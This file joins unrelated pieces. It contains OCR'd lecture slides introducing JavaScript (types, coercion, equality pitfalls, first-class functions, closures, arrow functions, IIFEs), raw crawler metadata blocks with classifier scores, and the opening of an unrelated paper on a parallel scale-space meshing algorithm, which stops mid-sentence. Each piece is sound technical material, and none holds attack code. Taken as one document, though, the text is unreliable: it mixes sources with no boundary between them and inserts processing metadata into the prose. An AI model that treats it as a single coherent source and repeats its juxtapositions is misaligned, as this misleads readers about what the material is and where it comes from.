"google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 46398, null]], "pdf_page_numbers": [[0, 3960, 1], [3960, 9628, 2], [9628, 14963, 3], [14963, 17997, 4], [17997, 23554, 5], [23554, 28660, 6], [28660, 31654, 7], [31654, 37260, 8], [37260, 42164, 9], [42164, 46398, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 46398, 0.11494]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
c45f388400b817ba76652fa5438d361473301c13
To Ponder Evaluate: True or false? \[ true == '1' \] \[ 'false' == false \] \[ 0 == '0' \] \[ 0 == '' \] \[ NaN == NaN \] JavaScript: Introduction, Types, Functions Lecture 15 History - Developed by Netscape - "LiveScript", then renamed JavaScript - *Nothing* to do with Java! - Motivation: client-side execution in browser - Interpreted - Standardized by ECMA ("ECMAScript") - Big update v6 in 2015, i.e. ES6 (aka ES2015) - Now annual updates, every June - After ES6, named with year (e.g. ES2020) - Has become popular outside of browsers - *e.g.* Node.js - Translation target for other languages: - Syntax: CoffeeScript - Static types: Dart (Google), TypeScript (MS) Client-Side Execution GET /news/index.php HTTP/1.1 Host: www.osu.edu User-Agent: Mozilla/5.0 (X11; Ubuntu;...etc <!DOCTYPE html> <html lang="en"> <head><title>My Page</title> <meta charset="utf-8" /> ... </html> <!DOCTYPE html> <html lang="en"> <head> <title>Something Short and Sweet</title> <meta charset="utf-8" /> </head> <body> <p>Hello <a href="planet.html">World</a>!</p> <br /> <img src="globe.png" alt="a globe"/> </body> </html> <!DOCTYPE html> <html lang="en"> <head> <title>Something Short and Sweet</title> <meta charset="utf-8" /> <script> window.alert("Annoying!"); </script> </head> <body> <p> Hello <a href="planet.html">World</a>! </p> <img src="globe.png" alt="a globe"/> </body> </html> Including Scripts - Head: executed before body displays - Script (source) can be explicitly included
```html
<script>
  console.info("hi");
  ...
</script>
```
- Script can be linked in from external file
```html
<script src="MyProgram.js"></script>
```
- Recall: linking to CSS - Inline: executed as body is displayed - Browser blocks while downloading - Common advice: put scripts at end of body - Modern advice: use `<script src="..." async>` Async/defer Downloading (diagram: parser, fetch, and execution timelines for plain, `defer`, and `async` scripts) Demo - Simple "hello world" (page1.html) - HTML file containing JavaScript - Body is empty, script writes HTML output - Browser displays result - Examining result with dev tools - Sources: see JavaScript program - Place breakpoints and reload - Console: see console output Some Objects Provided Implicitly - Some objects are created implicitly by the execution environment (browser) - Document object (document) - document.writeln() puts output in body - Window object (window) - Refers to browser's display window - Alert method pops up a dialogue
```javascript
window.alert("Say \"cheese\"!");
```
- Prompt method pops up a dialogue
```javascript
name = window.prompt("Enter name");
```
Demo with Popups - See: codepen.io/cse3901/pen/BYqqPb - Alert window - Prompt window - Console output (info, warn, error) - Notice: - HTML body is empty - Settings > Auto-update preview (Off) Familiar (Java) Minor Syntax - Statement separator ; - Wrinkle: ;'s are optional! - Implicitly (automatically) inserted - But clearer and safer to include explicitly - Statement blocks {...} - Parentheses in expressions (…) - Comments // and /*…*/ Familiar (Java) Operators - Arithmetic (numbers are floats) - `+` - `-` - `*` - `/` - `%` - Wrinkles: - No diff in `/` between ints and floats! - `%` works on floats! - Relational - `<` - `>` - `<=` - `>=` - `==` - `!=` - Wrinkle: `===` - `!==` - Logical - `&&` - `||` - `!` Familiar (Java) Statements - **Assignment** - `=` - `+= -= *= /= %=` - `++ --` (pre and post) - **Conditionals** - `if (...)`, `if (...) ... else` - `switch (c)` - `case 'a': ... case 'b': ... 
default:` - **Iteration** - `while (...)`, `do...while(...)` - `for (...;...;...)` - `break, continue` Primitive vs Reference Types - Distinction is similar to Java - A variable is a "slot" in memory - A variable can be *primitive* - The slot holds the value itself - Boolean, number, string, (null, undefined) - Since ECMAScript 2015 (ES6): symbols - A variable can be a *reference* - The slot holds a pointer to the value - Arrays and objects (including functions!) Primitive vs Reference Types (diagram: memory slots: `a`: 34.2, `b`: "hi", `c`: a pointer to an array, `d`: a pointer to an object with width: 12, height: 15, color: "blue") Primitives: Checking Equality
```javascript
let a = 5;
let b = 5;
let c = 7;
if (a == b) ... //=> true, equal slots
if (a == c) ... //=> false
let x = "hello";
let y = "hello";
if (x == y) ... //=> true! cf. Java
```
Primitives: Assignment is Copy
```javascript
let a = 5;
let b = a;      // copy contents of slot
b++;
if (a == 5) ... //=> true, a unchanged
```
Assignment is Copy (of Slot)
```javascript
let a = 5;
let b = a;
b++;
if (a == 5) ...
```
Primitives: Argument Passing
```javascript
function inc (param) { param++; }
let a = 5;
inc(a);          // copy contents of slot
if (a == 5) ...  //=> true
```
References: Checking Equality
```javascript
let a = {x:1, y:4};  // a new object
let b = {x:1, y:4};  // a new object
if (a == b) ...      //=> false
a = b;               // copy contents of slot
if (a == b) ...      //=> true
```
Assignment is Copy (of Slot) (diagram: before `a = b;` the two slots point to different objects, so `a != b`; afterwards both slots hold the same pointer, so `a == b`) References: Argument Passing
```javascript
function inc (param) { param.x++; }
let a = {x: 1, y: 4};
inc(a);            // copy contents of slot
if (a.x == 2) ...  //=> true
```
```javascript
function inc (param) { param = {x: 2, y: 7}; }
let a = {x: 1, y: 4};
inc(a);            // copy contents of slot
if (a.x == 2) ...  //=> false
```
Wrinkle: `==` vs `===` - Recall `+` operator in Java - Concatenation between strings - Addition between numbers - `3 + "4"` also works! Results in "34" - Similarly, JavaScript `== (!=)` tries to make types match - `3 == "3"` is true! - To prevent implicit type conversion, use `=== (!==)` - `3 === "3"` is false - More on type conversion later... Demo: Iteration - See: codepen.io/cse3901/pen/Jpmejp - Table generated by JavaScript - Prompt for initial value - Calculate interest series - Print out a row of table for each year Static vs Dynamic Types - **Static:** known at compile time - *e.g.*, C, C++, Java, Ada - `int x` - `char[] a` - `FluffyCloud t` - `void* d` - **Dynamic:** known only at run time - *e.g.*, Python, PHP, Ruby, JavaScript - `let x` - `let a` - `let t` - `let d` Static Types (diagram: statically typed slots: **a**: 34.2 (number), **b**: "hi" (string), **c**: num[] (an array: 4, 0, -300, 3.14), **d**: Shape (width: 12, height: 15, color: "blue")) Dynamic Types (diagram: the same slots, all declared with `let`: `a`: 34.2, `b`: "hi", `c`: an array holding 4, 0, -300, 3.14, `d`: an object with width: 12, height: 15, color: "blue") Function Signatures - Statically typed
```java
String parse(char[] s, int i) {... return e;}
out = parse(t, x);
```
- Parameter types (i.e. s and i) are declared - Return type (i.e. of parse) is declared - The compiler checks conformance of - (Declared) types of arguments (t, x) - (Declared) type of return expression (e) - (Declared) type of expression using parse (out) - Dynamically typed
```javascript
function parse(s, i) { ... }
out = parse(t, x)
```
- You are on your own! 
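To make "you are on your own" concrete, here is a small sketch (the function name and values are invented for this note, not taken from the lecture): nothing checks the argument types of a dynamically typed function until its body actually executes.

```javascript
// Hypothetical helper: silently assumes `values` is an array of numbers.
function scale(values, factor) {
  return values.map(v => v * factor);
}

console.log(scale([1, 2, 3], 10)); // [ 10, 20, 30 ], the intended use

try {
  scale("123", 10);                // wrong argument type, happily accepted until now
} catch (e) {
  console.error(e.message);        // TypeError: values.map is not a function
}
```

The same misuse in a statically typed language would be rejected before the program ever ran.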
Changing Types at Run-time Static Types
```java
// a is undefined
String a;     // a is null
a = "hi;      // compile-time err
a = "hi";
a = 3;        // compile-time err
a.push();
```
Dynamic Types
```javascript
// a is undeclared
let a;        // a is undefined
a = "hi;      // load-time error
a = "hi";
a = 3;        // a is a number
a.push();     // run-time error
```
Resources - MDN (Mozilla Developer Network) - developer.mozilla.org/docs/JavaScript - codepen.io, jsfiddle.net - HTML, CSS, JavaScript → result - REPL - In VM, at console: - $ node - In a browser: repl.it/languages/javascript - Class web site (under Resources) - Style guides (Airbnb, Google) - Books, available online - JavaScript: The Definitive Guide (Flanagan) - Eloquent JavaScript (Haverbeke) ## Conversion of Primitive Values <table> <thead> <tr> <th>numbers</th> <th>string</th> <th>number</th> <th>boolean</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>&quot;0&quot;</td> <td></td> <td>false</td> </tr> <tr> <td>-0</td> <td>&quot;0&quot;</td> <td></td> <td>false</td> </tr> <tr> <td>1</td> <td>&quot;1&quot;</td> <td></td> <td>true</td> </tr> <tr> <td>NaN</td> <td>&quot;NaN&quot;</td> <td></td> <td>false</td> </tr> <tr> <td>Infinity</td> <td>&quot;Infinity&quot;</td> <td></td> <td>true</td> </tr> <tr> <td>-Infinity</td> <td>&quot;-Infinity&quot;</td> <td></td> <td>true</td> </tr> <tr> <td>6.022e23</td> <td>&quot;6.022e+23&quot;</td> <td></td> <td>true</td> </tr> </tbody> </table> ## Conversion of Primitive Values <table> <thead> <tr> <th>boolean</th> <th>string</th> <th>number</th> <th>boolean</th> </tr> </thead> <tbody> <tr> <td><code>true</code></td> <td>&quot;true&quot;</td> <td>1</td> <td></td> </tr> <tr> <td><code>false</code></td> <td>&quot;false&quot;</td> <td>0</td> <td></td> </tr> </tbody> </table> <table> <thead> <tr> <th>strings</th> <th>string</th> <th>number</th> <th>boolean</th> </tr> </thead> <tbody> <tr> <td>&quot;&quot;</td> <td></td> <td>0</td> <td>false</td> </tr> <tr> <td>&quot; &quot;</td> <td></td> <td>0</td> <td>true</td> </tr> <tr> <td>&quot;1.2&quot;</td> <td></td> <td>1.2</td> <td>true</td> </tr> <tr> <td>&quot;0&quot;</td> <td></td> <td>0</td> <td>true</td> </tr> <tr> <td>&quot;one&quot;</td> <td></td> <td>NaN</td> <td>true</td> </tr> </tbody> </table> ## Conversion of Primitive Values <table> <thead> <tr> <th></th> <th>string</th> <th>number</th> <th>boolean</th> </tr> </thead> <tbody> <tr> <td><strong>undefined</strong></td> <td>&quot;undefined&quot;</td> <td>NaN</td> <td>false</td> </tr> <tr> <td><strong>null</strong></td> <td>&quot;null&quot;</td> <td>0</td> <td>false</td> </tr> </tbody> </table> Summary of (Simple?) Rules - How do numbers convert to things? - Boolean: 0 is false, non-0 is true (exception: NaN) - How do strings convert to things? - Numbers: non-valid syntax gives NaN (exception: empty/blank gives 0) - Boolean: true, only empty string is false - How does undefined convert to things? - Number: NaN - How does null convert to things? - Number: 0 How do things convert to boolean? - Empty string is `false` - Numbers (+/-) 0 and `NaN` are `false` - `undefined` and `null` are `false` Aka "falsy" (vs. "truthy") Importance: Boolean contexts ``` if (pet) ... ``` Pitfall: `&&`, `||` may not result in a boolean - `x || y` means `x ? x : y` (first `x` converted) ``` p = "cat" || "dog" //=> p == "cat" ``` - Old idiom: `!!x` forces conversion to boolean ``` p = !!("cat" || "dog") //=> p == true ``` Easier? Column-Major View - How do things convert to Numbers? 
- Empty (and whitespace) string is 0 - Non-numeric strings are NaN - `undefined` is NaN - `null` is 0 - Importance: Used in `==` evaluation == Evaluation is... Different - When types do not match, coerce: - `null` & `undefined` (only) equal each other - Strings & booleans converted to numbers: - `"1.0" == true` && `"" == false` - Pitfall: `NaN` is not equal to `NaN` - When one operand is an object: - Convert via `valueOf` (or `toString`) - Result then compared with usual `==` rules - Note: no coercion when both operands are references (`==` is reference equality) - Note: - `===` never coerces To Ponder Evaluate: True or false? \[ true == '1' \] \[ 'false' == false \] \[ 0 == '0' \] \[ 0 == '' \] \[ NaN == NaN \] Surprising Consequences
```
false == 'false'                         //=>
false == '0'                             //=>
!!'0'                                    //=>
('0' == 0) && (0 == '') && ('0' != '')   //=>
(NaN == true) || (NaN == false)          //=>
!!NaN                                    //=>
(NaN != 0) && (!!NaN == !!0)             //=>
```
- dorey.github.io/JavaScript-Equality-Table Surprising Consequences
```
false == 'false'                         //=> false
false == '0'                             //=> true
!!'0'                                    //=> true
('0' == 0) && (0 == '') && ('0' != '')   //=> true
(NaN == true) || (NaN == false)          //=> false
!!NaN                                    //=> false
(NaN != 0) && (!!NaN == !!0)             //=> true
```
- dorey.github.io/JavaScript-Equality-Table Functions are People too - Named functions: declaration & use
```javascript
function foo(a, b) { ... }
foo("hi", 3);
```
- Anonymous functions
```javascript
function(a, b) { ... }
// how do we invoke such a thing?
```
- Functions are objects (first-class citizens) - They can be assigned to variables!
```javascript
let foo = function(a, b) {...};
foo("hi", 3);
let bar = foo;   // cf. let bar = foo();
bar("world", 17);
```
Functions are Objects (diagram: a `Circle` constructor function object that sets `this.centerX = x;`, `this.centerY = y;`, etc., and a method returning `Math.PI * this.radius * this.radius`) Functions Can Be Arguments
```javascript
function apply(x, a) {
  return x(a);   // x is a function!
}
function square(i) { return i * i; }
apply(square, 5) //=> 25
```
Functions Can Be Return Values
```javascript
function grantDegree() {
  function addTitle(name) { return "Dr. " + name; }
  return addTitle;   // a function!
}
let phd = grantDegree();
phd("Turing");   // phd is a function
phd(3/2);        //=> "Dr. 1.5"
```
Closures
```javascript
function greaterThan(bound) {
  function compare (value) { return value > bound; }
  return compare;   // 1-arg function
}
let testPos = greaterThan(0);
testPos(4)  //=> true
testPos(-3) //=> false
```
Closures + Anonymity
```javascript
function greaterThan(bound) {
  function compare (value) { return value > bound; }
  return compare;   // 1-arg function
}
let testPos = greaterThan(0);
testPos(4)  //=> true
testPos(-3) //=> false
```
```javascript
function greaterThan(bound) {
  let compare = function(value) { return value > bound; };
  return compare;   // 1-arg function
}
let testPos = greaterThan(0);
testPos(4)  //=> true
testPos(-3) //=> false
```
Closures + Anonymity
```javascript
function greaterThan(bound) {
  return function(value) { return value > bound; }
}
let testPos = greaterThan(0);
console.log(testPos(4));  // => true
console.log(testPos(-3)); // => false
```
Arrow Function Expressions - Concise notation for anon. functions - Syntax: - Omit `function` keyword - Place arrow `=>` between params and body - `(a, b = 10) => { ... 
}` - `(r) => { return Math.PI*r**2 }` - For one-liner, can omit `return` and `{}`’s - `(r) => Math.PI * r**2` - For one parameter, can omit `()` - `r => Math.PI * r**2` - Use where function expressions needed - `let area = r => Math.PI * r**2` Closures + Anonymity Revisited
```javascript
function greaterThan(bound) {
  return value => value > bound;
}
let testPos = greaterThan(0);
testPos(4)  //=> true
testPos(-3) //=> false
```
IIFE - Immediately Invoked Function Expression - Define *and* invoke function at the same time - Basic forms: - `(function() { /* code here */ })();` - `let n = function() { /* code here */ }();` - Work-around for weird JavaScript scoping - `var` scopes variables to the enclosing *function* - IIFE creates a lexical scope (with closures) - Modern JavaScript has `let` (and `const`) - These scope variables to the enclosing *block* - General advice: prefer `let` to `var` - IIFEs are still encountered in the wild Summary - Truthy, falsy, and friends - Type coercion is everywhere - Coerce to boolean in conditionals - Coerce to number for == - Functions as first-class citizens - Can be passed as arguments - Can be returned as return values! - Closures: carry their context
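As a closing illustration of the summary's last points (coercion and closures), here is one more hypothetical snippet, not taken from the lecture:

```javascript
// A closure carries its context: `count` survives between calls.
function makeCounter() {
  let count = 0;
  return () => ++count;
}

const next = makeCounter();
console.log(next(), next(), next()); // 1 2 3

// Coercion in action: == converts to numbers, if () converts to boolean.
console.log("1.0" == true);          // true (both sides become the number 1)
if (!"") console.log("'' is falsy"); // the empty string coerces to false
```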
{"Source-Url": "http://web.cse.ohio-state.edu/~giles.25/3901/lectures/lecture15.pdf", "len_cl100k_base": 4934, "olmocr-version": "0.1.50", "pdf-total-pages": 54, "total-fallback-pages": 0, "total-input-tokens": 77138, "total-output-tokens": 6849, "length": "2e12", "weborganizer": {"__label__adult": 0.00028133392333984375, "__label__art_design": 0.00028967857360839844, "__label__crime_law": 0.00012803077697753906, "__label__education_jobs": 0.0008420944213867188, "__label__entertainment": 8.83936882019043e-05, "__label__fashion_beauty": 0.00010019540786743164, "__label__finance_business": 0.00010389089584350586, "__label__food_dining": 0.00028133392333984375, "__label__games": 0.0004417896270751953, "__label__hardware": 0.0005288124084472656, "__label__health": 0.00017917156219482422, "__label__history": 0.00016367435455322266, "__label__home_hobbies": 7.665157318115234e-05, "__label__industrial": 0.00018775463104248047, "__label__literature": 0.00022852420806884768, "__label__politics": 0.00010448694229125977, "__label__religion": 0.000324249267578125, "__label__science_tech": 0.002147674560546875, "__label__social_life": 9.08970832824707e-05, "__label__software": 0.006763458251953125, "__label__software_dev": 0.98583984375, "__label__sports_fitness": 0.00021898746490478516, "__label__transportation": 0.00022971630096435547, "__label__travel": 0.00017750263214111328}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 14892, 0.0154]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 14892, 0.60602]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 14892, 0.54776]], "google_gemma-3-12b-it_contains_pii": [[0, 170, false], [170, 225, null], [225, 734, null], [734, 954, null], [954, 1237, null], [1237, 1549, null], [1549, 2023, null], [2023, 2086, null], [2086, 2375, null], [2375, 2824, null], [2824, 3028, null], [3028, 3285, null], [3285, 3575, null], [3575, 3894, null], [3894, 4270, null], [4270, 4385, null], [4385, 4606, null], [4606, 4748, null], [4748, 4838, null], [4838, 4997, null], [4997, 5157, null], [5157, 5230, null], [5230, 5403, null], [5403, 5535, null], [5535, 5896, null], [5896, 6084, null], [6084, 6381, null], [6381, 6541, null], [6541, 6736, null], [6736, 7263, null], [7263, 7590, null], [7590, 8014, null], [8014, 8456, null], [8456, 8931, null], [8931, 9183, null], [9183, 9564, null], [9564, 10026, null], [10026, 10238, null], [10238, 10715, null], [10715, 10843, null], [10843, 11118, null], [11118, 11445, null], [11445, 11903, null], [11903, 12046, null], [12046, 12222, null], [12222, 12491, null], [12491, 12736, null], [12736, 12991, null], [12991, 13209, null], [13209, 13452, null], [13452, 13880, null], [13880, 14083, null], [14083, 14617, null], [14617, 14892, null]], "google_gemma-3-12b-it_is_public_document": [[0, 170, true], [170, 225, null], [225, 734, null], [734, 954, null], [954, 1237, null], [1237, 1549, null], [1549, 2023, null], [2023, 2086, null], [2086, 2375, null], [2375, 2824, null], [2824, 3028, null], [3028, 3285, null], [3285, 3575, null], [3575, 3894, null], [3894, 4270, null], [4270, 4385, null], [4385, 4606, null], [4606, 4748, null], [4748, 4838, null], [4838, 4997, null], [4997, 5157, null], [5157, 5230, null], [5230, 5403, null], [5403, 5535, null], [5535, 5896, null], [5896, 6084, null], [6084, 6381, null], [6381, 6541, null], [6541, 6736, null], [6736, 7263, null], [7263, 7590, null], [7590, 8014, null], [8014, 8456, 
null], [8456, 8931, null], [8931, 9183, null], [9183, 9564, null], [9564, 10026, null], [10026, 10238, null], [10238, 10715, null], [10715, 10843, null], [10843, 11118, null], [11118, 11445, null], [11445, 11903, null], [11903, 12046, null], [12046, 12222, null], [12222, 12491, null], [12491, 12736, null], [12736, 12991, null], [12991, 13209, null], [13209, 13452, null], [13452, 13880, null], [13880, 14083, null], [14083, 14617, null], [14617, 14892, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 14892, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 14892, null]], "pdf_page_numbers": [[0, 170, 1], [170, 225, 2], [225, 734, 3], [734, 954, 4], [954, 1237, 5], [1237, 1549, 6], [1549, 2023, 7], [2023, 2086, 8], [2086, 2375, 9], [2375, 2824, 10], [2824, 3028, 11], [3028, 3285, 12], [3285, 3575, 13], [3575, 3894, 14], [3894, 4270, 15], [4270, 4385, 16], [4385, 4606, 17], [4606, 4748, 18], [4748, 4838, 19], [4838, 4997, 20], [4997, 5157, 21], [5157, 5230, 22], [5230, 5403, 23], [5403, 5535, 24], [5535, 5896, 25], [5896, 6084, 26], [6084, 6381, 27], [6381, 6541, 28], [6541, 6736, 29], [6736, 7263, 30], [7263, 7590, 31], [7590, 8014, 32], [8014, 8456, 33], [8456, 8931, 34], [8931, 9183, 35], [9183, 9564, 36], [9564, 10026, 37], [10026, 10238, 38], [10238, 10715, 39], [10715, 10843, 40], [10843, 11118, 41], [11118, 11445, 42], [11445, 11903, 43], [11903, 12046, 44], [12046, 12222, 45], [12222, 12491, 46], [12491, 12736, 47], [12736, 12991, 48], [12991, 13209, 49], [13209, 13452, 50], [13452, 13880, 51], [13880, 14083, 52], [14083, 14617, 53], [14617, 14892, 54]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 14892, 0.04211]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
5fdcea4c7bc22bff098766d487177fabdb914e5a
An Implementation and Parallelization of the Scale-Space Meshing Algorithm Julie Digne LIRIS, CNRS UMR 5205, Université Lyon 1 (julie.digne@liris.cnrs.fr) HAL Id: hal-01238790, https://hal.archives-ouvertes.fr/hal-01238790, submitted on 9 Dec 2015. Abstract Creating an interpolating mesh from an unorganized set of oriented points is a difficult problem which is often overlooked. Most methods focus indeed on building a watertight smoothed mesh by defining some function whose zero level set is the surface of the object. However in some cases it is crucial to build a mesh that interpolates the points and does not fill the acquisition holes: either because the data are sparse and trying to fill the holes would create spurious artifacts or because the goal is to explore visually the data exactly as they were acquired without any smoothing process. In this paper we detail a parallel implementation of the Scale-Space Meshing algorithm, which builds on the scale-space framework for reconstructing a high precision mesh from an input oriented point set. This algorithm first smoothes the point set, producing a singularity free shape. It then uses a standard mesh reconstruction technique, the Ball Pivoting Algorithm, to build a mesh from the smoothed point set. The final step consists in back-projecting the mesh built on the smoothed positions onto the original point set. The result of this process is an interpolating, hole-preserving surface mesh reconstruction. Source Code The ANSI C++ source code that allows reproducing the results from the on-line demo is available at the IPOL web page of this article. The scale-space meshing algorithm uses the Ball Pivoting Algorithm which is linked to patent US6968299B1. It is made available for the exclusive aim of serving as a scientific tool to verify the soundness and completeness of the algorithm description. Keywords: surface reconstruction; scale-space 1 Introduction Surface mesh reconstruction methods can be divided into two categories: methods that build a closed surface out of the input point set (implicit surface methods) and methods that aim at finding a mesh whose vertices are the input point set. While the first approach is widespread because it generates smooth, closed and economical meshes, usually by extracting the zero level set of some potential field ([8], [9], [10]), the second kind of approach is crucial in some cases, when the surface is intrinsically open, or when one wants to visualize exactly the outcome of the laser scanner. For example, a LIDAR device acquiring a town yields point sets that are impossible to reconstruct with implicit surface reconstruction methods. And even in the case of a laser-scanner acquired object surface, an implicit surface reconstruction method will lose the input surface accuracy: it will reconstruct a smooth surface. 
In this paper we are interested in the second kind of approach, which aims at building a mesh interpolating the initial point set. Most mesh interpolating methods are based on building a Delaunay diagram of the input point set and filtering facets. Though efficient, these processes involve building a global structure that is not always desirable. To overcome this limitation, the Ball Pivoting Algorithm is a powerful heuristic for building a Delaunay-like triangulation of scattered 3D points without resorting to a global structure. It was introduced by [1] and provided a way to build an interpolating mesh in contrast with other research directions aiming at building an approximating mesh (e.g. [2], [8], [9], [10]). Although this method works well for noiseless data, or data with details at a scale coherent with the chosen radius of the ball, it fails dramatically when the data contain small details or noise, as will be shown in Section 7. Yet if the data have to be smoothed before building the mesh, then the interpolating property of the method is lost. To overcome this limitation, [6] proposed a method that, through the use of a scale-space, allows for a better interpolation of the original raw points even in the presence of noise and small details. A scale-space is a representation of a shape at different geometric scales, i.e. at different degrees of smoothness. The principle behind the scale-space meshing method is that once the shape is smoothed, one can use a standard surface mesh reconstruction algorithm to interpolate the point set. The mesh for the original scale can then be deduced from the smoothed scale mesh. In short, the scale-space meshing is one of the applications of the scale-space framework, which can be used to infer a wide variety of information on an original point set by estimating it on a smoother version of it. This paper describes a parallel implementation of the scale-space meshing algorithm. The mesh reconstruction part of the algorithm is based on the Ball Pivoting Algorithm for which we provide a parallel implementation slightly adapted from [3], where the reader will find all necessary details on the data structures. The next paragraph is a brief reminder of the data structures used in this implementation. Data structures. The scale-space meshing algorithm needs two important data structures: a search structure that allows for fast queries of neighborhoods and a mesh structure that will be built incrementally. The search structure is an octree that will store the points and provide methods for fixed range neighborhood queries. The mesh structure we build is a manifold with holes structure: a set of triangular facets between vertices where each triangle edge can only be adjacent to two facets, and edges with only one adjacent triangle are authorized. We refer the reader to [3] for all the details on these two structures. The remainder of this paper is organized as follows: Section 2 explains the scale-space and its particular implementation. Section 3 explains how the scale-space framework is used in the reconstruction setting. Section 4 describes the parallelization of the method. Section 5 deals with the choice of parameters for the method. Section 6 explains the dependencies of the code. Finally Section 7 shows several experiments using the Scale-Space Meshing algorithm and offers comparisons with other existing methods. 2 A Scale-Space for Point Sets 2.1 Definitions Let $\mathcal{M}$ be a smooth surface in $\mathbb{R}^3$ assumed to be at least $C^2$. 
At each point $x$ of the surface one can define a normal direction $n(x)$, a vector perpendicular to the tangent plane. There are two possible orientations for this vector (pointing either inwards or outwards). In the continuous surface setting, the normal $n(x)$ is always oriented towards the concavity of the shape. At each point $x$, one can pick a normal plane containing the normal and a chosen tangent direction (i.e. a vector in the tangent plane). The intersection of this plane and the surface is a planar curve whose curvature at $x$ is the surface directional curvature corresponding to the chosen tangent direction. The principal curvatures $k_1(x)$ and $k_2(x)$ of the surface at $x$ are defined as the minimum and maximum directional curvatures of the surface, and the mean curvature of $\mathcal{M}$ at $x$ is $H(x) = \frac{1}{2}(k_1(x) + k_2(x))$. The scale-space for point sets is described in [5] and [6]. It consists in applying the mean curvature motion (MCM) to a set of points. The mean curvature motion is written: $$\frac{\partial x}{\partial t} = H(x)n(x).$$ In other words, all points move toward the concavity of the shape at a rate equal to the surface mean curvature. 2.2 Mean Curvature Motion Implementation As shown in [6], the mean curvature motion can be approximated by the iterative process of projecting each point of the data set onto its local regression plane. The iterative projection process allows for the computation of robust geometric information (after several scale-space iterations) and this geometric information can be backtracked to the initial scale, for example by associating the curvature of an evolved point computed at a scale $t$ with the initial position of the point at scale 0. The method for computing one step of the mean curvature motion is explained in Algorithm 1. Numerically, the orientation of the normal is different from the continuous case: the normals are not oriented toward the concavity but consistently over the surface (i.e. all normals point either inwards or outwards). Since the projection algorithm makes no use of the normal, the choice of the orientation is irrelevant for the mean curvature motion, but having this information is useful for the Ball Pivoting Algorithm. Algorithm 1: $MCM(p, P, r)$: One step of the Mean Curvature Motion (MCM) Input: A point set $P$, a query point $p$, a radius $r$ Output: A point $p'$, result of one discrete step of the MCM applied to $p$ 1. Get the set of neighbors $\mathcal{N}_r(p)$ out of the octree $O$; 2. if $\#\mathcal{N}_r(p) < 5$ then 3. Remove point $p$ 4. $\bar{p} \leftarrow \frac{\sum_{q \in \mathcal{N}_r(p)} w(q) q}{\sum_{q \in \mathcal{N}_r(p)} w(q)}$ and $C \leftarrow \sum_{q \in \mathcal{N}_r(p)} w(q)(q - \bar{p})(q - \bar{p})^T$; 5. $v_0 \leftarrow$ eigenvector corresponding to the least eigenvalue of $C$; 6. $p' \leftarrow p - \langle p - \bar{p}, v_0 \rangle v_0$; 7. $p'.n \leftarrow \frac{p - p'}{\|p - p'\|} \cdot \text{sign}(\langle p - p', p.n \rangle)$; Three steps require some explanations: • Line 3: If the point does not have enough neighbors, it is considered as an outlier and discarded. • Line 4: \( w(q) \) ensures stability of the approximation by giving more weight to neighboring points than to remote points: \[ w(q) = \exp\left(-\frac{\|p - q\|^2}{2\gamma^2}\right). \] • Line 6: The regular mean curvature motion would stop after line 6, yet we use a slightly modified motion where the normals are smoothed jointly with the positions, to reflect the normal direction of the current shape (line 7). 
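As a quick sanity check of the projection step, consider a toy configuration (invented for this note, not an example from the paper): suppose the weighted barycenter of the neighbors is $\bar{p} = (0, 0, 0.05)$, the eigenvector associated with the least eigenvalue of $C$ is $v_0 = (0, 0, 1)$, and $p = (0, 0, 0.3)$. Then line 6 gives
\[
p' = p - \langle p - \bar{p}, v_0 \rangle v_0 = (0, 0, 0.3) - 0.25\,(0, 0, 1) = (0, 0, 0.05),
\]
that is, $p$ is dropped onto its local regression plane $z = 0.05$; repeating this projection over all points is what progressively smooths the shape.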
Smoothing normals is important in the case of noisy input normals but also to improve the performance of the Ball Pivoting Algorithm. The barycenter and covariance computation (Line 4 - function \textit{performLocalPCA} in the code) is performed using a numerically stable online algorithm [14]. The covariance matrix being a \( 3 \times 3 \) real symmetric matrix, a simple ad hoc eigendecomposition algorithm is used [13]. Algorithm 1 is exactly one step of the projection on the Moving Least Squares Surface of order 1 (MLS1) induced by the point set. Moving Least Squares Surfaces are surfaces defined locally by performing an explicit surface regression (e.g. a polynomial surface defined over the local tangent plane) around a position. 2.3 Scale-Space Implementation As previously stated, the discrete scale-space consists in applying Algorithm 1 to the whole point set. In practice, the iterations require building a new point set after each iteration. But there is no need to keep at each step all the results of all the iterations. In fact, we only need to store the original point set (for back-projection, which will be explained later), the result of the last iteration and a buffer for the point set being constructed at the current iteration. Compared to [3], points are still stored in an octree, but the nodes of the octree do not contain a single set of points but three sets of points. The first set contains the points of the original cloud and the other two serve for storing intermediary scale-space iterations. More precisely, Set 0 is preserved: it contains the original point 